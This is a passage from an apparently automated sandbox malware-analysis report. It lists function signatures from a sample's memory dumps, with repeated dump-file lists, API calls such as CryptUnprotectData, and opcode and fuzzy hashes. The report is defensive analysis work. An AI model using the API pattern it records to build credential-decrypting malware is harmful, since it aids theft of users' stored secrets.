                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 3c47d20f9a9d3fff566e56ba9950d530bf7bf4d89183fc7a54620a71ef8fc8bc
                              • Instruction ID: 7c0073c246eb46356272bd38d3733eb9b9b2568e40a939e0b3599f39d454ebb0
                              • Opcode Fuzzy Hash: 3c47d20f9a9d3fff566e56ba9950d530bf7bf4d89183fc7a54620a71ef8fc8bc
                              • Instruction Fuzzy Hash: 8CF0A9B02543126BE7305F69AC89F977BA8AB04B51F250514FB45EE2D0D7B8DC40DAA4
                              APIs
                              • CoCreateInstance.COMBASE(007DB110,00000000,00000001,007DB100,?), ref: 007CCB06
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 007CCB46
                              • lstrcpyn.KERNEL32(?,?,00000104), ref: 007CCBC9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                              • String ID:
                              • API String ID: 1940255200-0
                              • Opcode ID: 6609b77731755bee1980bba81356011f912c5f3840f43fc012c62dec587c5503
                              • Instruction ID: 44a4a1531a31b9700e55fdd6cb821099e1d8f407914f3490c25184081c4face1
                              • Opcode Fuzzy Hash: 6609b77731755bee1980bba81356011f912c5f3840f43fc012c62dec587c5503
                              • Instruction Fuzzy Hash: 97317871A40219BFD710DB94CC82F9A77B9DB88B10F104188FA08EB2D0D7B5AD44CB90
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007B9B9F
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007B9BB3
                              • LocalFree.KERNEL32(?), ref: 007B9BD7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 658bf4658ca4377d2c7632c2025e4c6279c29f1e2f115d08a2c1ba292668e43a
                              • Instruction ID: a84d16f8dedd422599b12bdb96735a57f919464b1cf0c1170a2b5310ef98bbf6
                              • Opcode Fuzzy Hash: 658bf4658ca4377d2c7632c2025e4c6279c29f1e2f115d08a2c1ba292668e43a
                              • Instruction Fuzzy Hash: 00011DB6E5520AABE710DBA4DC45FABB778EB44B01F104554EA04AB280D7B49E00CBE0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _${y
                              • API String ID: 0-3116576199
                              • Opcode ID: 677fd9ae5c46a5c8ea44b8305fc7b706ce23cf49db3d6867c46c658672214ed6
                              • Instruction ID: 396423f9767da80bc7f0398b595430b49be6e3b9419182e1cdd1c517bd7df704
                              • Opcode Fuzzy Hash: 677fd9ae5c46a5c8ea44b8305fc7b706ce23cf49db3d6867c46c658672214ed6
                              • Instruction Fuzzy Hash: AB5110F35087049FE344AE29DD8637AFBE6EFD4320F1A892DD6C587744EA3858418686
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: O6;
                              • API String ID: 0-3251865006
                              • Opcode ID: b52a3f8b904dbfcdb02cd9ceef17f76f12c1ac26112645d52fb4a5da5303b48c
                              • Instruction ID: b149870b10997c9ff4cf7b431798872188785d599e3a6a885fce65accc4f3a7c
                              • Opcode Fuzzy Hash: b52a3f8b904dbfcdb02cd9ceef17f76f12c1ac26112645d52fb4a5da5303b48c
                              • Instruction Fuzzy Hash: 8F122AF350C2049FE304AE2DEC8567ABBE9EBD4360F168A3DE9C4C7744E6359905C682
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $9l^
                              • API String ID: 0-1614111026
                              • Opcode ID: fb013a84fd5a1fb5aa044262af0390ee0f013d68dab614657e88f3ce3e2c2c4e
                              • Instruction ID: abcd69be5278eb67c0c810b59d4d7b06ba3866e9ff1ae69b3df0d8cb320884a5
                              • Opcode Fuzzy Hash: fb013a84fd5a1fb5aa044262af0390ee0f013d68dab614657e88f3ce3e2c2c4e
                              • Instruction Fuzzy Hash: 2551A4F7E186009FE701AE2DDC8572AFBE5EF98314F1A493CDAC8D3344E53994148686
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =caO
                              • API String ID: 0-4078013694
                              • Opcode ID: ca278788e6b51008413f1020e88ed296ed670f7006e4a6b096bf102f534e12f8
                              • Instruction ID: 1dee47f347a09ad96755298ce10f4df9ec93f6f3cac160687c70528f858e54bb
                              • Opcode Fuzzy Hash: ca278788e6b51008413f1020e88ed296ed670f7006e4a6b096bf102f534e12f8
                              • Instruction Fuzzy Hash: A75149F3E092204BF3149919EC957B6BA96DFD4320F2B803DDB89977C4E979580683C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 85463c47d1efaa75711b5035b94ba48b6019da2b9da08d818d296ff9fd9aaec4
                              • Instruction ID: 5c750d74acfae1614361e6a7ef2447761de7c39c429c02df51834eca69d6a948
                              • Opcode Fuzzy Hash: 85463c47d1efaa75711b5035b94ba48b6019da2b9da08d818d296ff9fd9aaec4
                              • Instruction Fuzzy Hash: 5CE1F7F350C2009FE7146E28EC91BBABBE9EF54720F16093DEAC4D3740E63598458697
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b1853b8358ca3ae9b0e71207bf4fff3c4c5dd2ce41343b041312422058092638
                              • Instruction ID: 8c822b2c58e1648e3857cfa2318a6fc11bd0fffedcc2cb8cf20c6d6e93f5170b
                              • Opcode Fuzzy Hash: b1853b8358ca3ae9b0e71207bf4fff3c4c5dd2ce41343b041312422058092638
                              • Instruction Fuzzy Hash: 2161E6B3A092109FE3045E29DC8136AF6D6EFD4320F2B493DDAC5D7784E97858058796
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: efbbca511e1cbcdc6728d27edd35ee5136c403d784ff0648343560ae43176cf2
                              • Instruction ID: 1b1ae3782d6249616cb7f8d451376ce6013e96b5f7e14304211015816899e881
                              • Opcode Fuzzy Hash: efbbca511e1cbcdc6728d27edd35ee5136c403d784ff0648343560ae43176cf2
                              • Instruction Fuzzy Hash: F35125F39082046FE304AE29EC4177AB7EAEF94720F1A493DE6C4C7740E63598558793
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23d6ae29e47a2278b65ab8f8dc5b549319a47fa9688eb22e86931567886bfe99
                              • Instruction ID: df0b46ca3eb9d003b4a5bc635eadc4a8d232036d3f6d5f405c79e5492742a81e
                              • Opcode Fuzzy Hash: 23d6ae29e47a2278b65ab8f8dc5b549319a47fa9688eb22e86931567886bfe99
                              • Instruction Fuzzy Hash: 3D41D3F3A186145BE314AA1CDC8577AB7D6EF94710F0A493CDBC4C7780E93DA8198686
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b4daad53d942201a209afb87794fa314599dfaad260d82dfcc24108f0fc8569
                              • Instruction ID: ebfce5b23c9384b45e6a44d147e3a14dd3e95e372dbf2033ef430efe3c36b45f
                              • Opcode Fuzzy Hash: 5b4daad53d942201a209afb87794fa314599dfaad260d82dfcc24108f0fc8569
                              • Instruction Fuzzy Hash: 5941BFF291C7149FE7107F28EC857BABBE8EB55310F06492DEAD483300E63598448B97
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
